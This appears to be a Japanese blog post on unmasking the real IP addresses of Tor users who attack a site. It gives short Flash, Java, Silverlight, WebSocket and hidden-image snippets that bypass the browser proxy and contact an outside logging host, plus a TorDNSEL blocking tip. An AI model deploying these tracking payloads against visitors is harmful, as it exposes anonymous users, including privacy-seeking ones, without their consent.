匿名化ソフト(TOR)で攻撃された場合の生IPアドレス取得方法

難攻不落のTorを使用された攻撃を受けた場合大概の人は泣き寝入りの状況ですが、私達whitehackerzは幾つか有効な生IP取得作戦を考えました。

それぞれ一つ一つでは数%の成功率しかないかもしれませんが、全てやる事により数十パーセント程度になるはずです。

また、記載事項には決定打は載せてません。(我々も犯人追及中の身でありますからご容赦願いたいと思います)これらよりも格段に優れた方法もありますからTor=恐怖という図式も近々崩壊する事と思います。

メソッド1   Adobe Flash Player

Flash Playerは串に非対応
「Flashのロード->リクエストを送信」で生IPを取得でき

ActionScript
var urlRequest:URLRequest = new URLRequest();
urlRequest.url = “http://example.com/log“;
var urlLoader:URLLoader = new URLLoader();
urlLoader.load(urlRequest);

http://help.adobe.com/ja_JP/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b8f6c0-7ffe.html
http://forums.adobe.com/message/4262734
http://forums.adobe.com/thread/685245

メソッド2   Oracle Java

Javaはブラウザに設定された串を使用できるが、
串を使用せずにリクエストを送信することもできる
「アプレットのロード->リクエストを送信」で生IPを取得でき

Java
URL url = new URL(“http://anonymouse.com/log“);
URLConnection conn = url.openConnection(Proxy.NO_PROXY);

http://www.rgagnon.com/javadetails/java-0085.html

メソッド3   Microsoft Silverlight

SilverlightのHTTPクライアントはブラウザに設定された串を使用するが、
ソケットクラスを使用すれば串をbypassできる
メソッド1と2のように生IPを取得できる

Silverlight + C#
var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
var socketAsyncEventArgs = new SocketAsyncEventArgs();
socketAsyncEventArgs.RemoteEndPoint = new DnsEndPoint(“anonymouse.com“, 80);
socket.ConnectAsync(socketAsyncEventArgs);

System.Net.Sockets
http://msdn.microsoft.com/en-us/library/system.net.sockets(v=vs.95).aspx
Silverlight 2 and System.Net.Sockets.Socket
http://weblogs.asp.net/mschwarz/archive/2008/03/07/silverlight-2-and-sockets.aspx

メソッド4   WebSocket

実装によってはブラウザの串の設定を無視することもある
串の設定を無視するような実装であれば生IPを取得できる

JavaScript
socket = new WebSocket(“ws://h0lnugtzsrpbx1wj.anonymouse.com:8800/log“);
socket.send(‘test’);

FirefoxのWebSocketでDNS漏れ
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs

http://www.html5rocks.com/ja/tutorials/websockets/basics/
http://ja.wikipedia.org/wiki/WebSocket

メソッド5   SSL

ブラウザの設定によっては、SSLを使用した接続のとき串を通さないことがある
サイト全体をSSL接続にすることが不可能な場合は、
0pxの画像をページに入れると生IPを取得できる
<img width=”0″ src=”https://domain/0px.jpg“>

メソッド6   TorDNSELを利用してアク禁

悪意を持つユーザーにTorを悪用させない最も有効な手段
アク禁

https://www.torproject.org/projects/tordnsel.html.en